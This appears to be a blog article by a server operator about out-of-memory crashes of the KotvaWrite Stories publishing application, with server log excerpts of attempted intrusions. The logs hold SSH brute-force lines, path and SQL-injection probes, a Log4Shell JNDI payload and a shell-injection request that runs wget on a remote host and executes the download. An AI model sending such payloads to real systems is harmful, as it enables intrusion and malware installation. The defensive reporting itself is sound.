Even when running on a single server KotvaWrite Stories could easily be left for a month without any special monitoring if the number of concurrent users is not overly high. An exception to this assumption may be made in mysterious cases where the memory and disk usage of a virtual server (Linux) momentarily rise quickly and stay in that state for some time. That could crash the application server on which the publishing application is installed. The consequences may not be too critical, as any unfinished database and file saves can/should be fixed and cleaned up semi-automatically, after which a simple restart of the application server might be sufficient to get things back to normal. However, if there is a large number of hacking attempts involved, some OS-level resources may be exhausted, such as the number of open files ("files that are currently being reviewed or modified").

By looking through the log file of the kernel of a Linux operating system in use, one may notice that the Java process has run out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and it is configurable in which limits the associated Java process is allowed to use memory. Stress tests have shown that certain configurations for memory usage are enough - until for some reason they are not.

On the Linux operating system where the publishing application is installed, two APM (Application Performance Monitoring) agents are separately installed, which collect in real time information e.g. about both the operating system and the publishing application, which can then be viewed in a variety of ways in the web interfaces of the APM services (which might be New Relic and Datadog). In these out of memory cases, one and the same thing has always been found to be true: the amount of web traffic has not been a significant factor at a time when virtual process usage has grown by e.g. a factor of 20 and disk is used in a miraculously large amount in a short period of time. At such times, it is not surprising that the database queries might take more than ten seconds to run instead of the normal few milliseconds.

In addition, there is also an external service such as Papertrail, which can be used for redirecting log data from several sources such as the application server and the operating system, so that the log data does not have to be read in a Linux shell, but instead it can be viewed through a certain kind of web interface. A notion about hackers hava emerger from browsing the gathered logs. It seems that someone or some wannabe hackers etc. have done a lot of some kind of crude experimentation to get through defences of the operating system, application server and release application. This has been ongoing throughout 2022, but not once has there been an attempt to cause a Distributed Denial of Service (DDoS) attack, but e.g. rather a slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?

Contemplating the cause of the timing of out of memory errors tend to lead to a notion that the timing of some of the hacking attempts happen just seconds before the memory runs out, but could that have something do with not having dedicated servers? That means the same physical hardware resources are used by more than one datacenter client (in other words: a server is actually a so-called virtual server). Sometimes the actual hardware can cause failures, so the cause for problems could also be something other than what can be seen in the available logs and dashboards displaying visualized data. However, the data centre service provider said that was no anomaly to report at the time of the problematic out of memory events.

Normally, when using a Hetzner virtual server, one instance of the CPX21 virtual server with 4 GB of memory and 3 slices of CPU time has been enough for "basic use", but there are other explanations for out of memory errors and other strangely anomalous problems than those already mentioned. E.g. the application server might be way behind the latest version, and the could apply to Java, the programming language used on the server side. There are separate settings for when and how the application server and Java clean up memory to remove things that are no longer needed, but they are rather generally left to their default settings. All of this is quite manageable, but may require lots of monitoring and testing to detect borderline cases.

The remainder of this article contains observations about certain out of memory event. And if this is where one can send greetings to the administration of the publishing application, it should be mentioned that some additional configuration could be done to ensure that the IP addresses wouldn't appear as 127.0.0.1 in the application server logs, but as the original IP addresses. Although, could General Data Protection Regulation (GDPR) have anything to say about this?

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations to access non-installed web interface:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by typing parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787

The second log on the application server (catalina) sometimes contains an experiment with imaginary weaknesses:

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

       java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

   java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens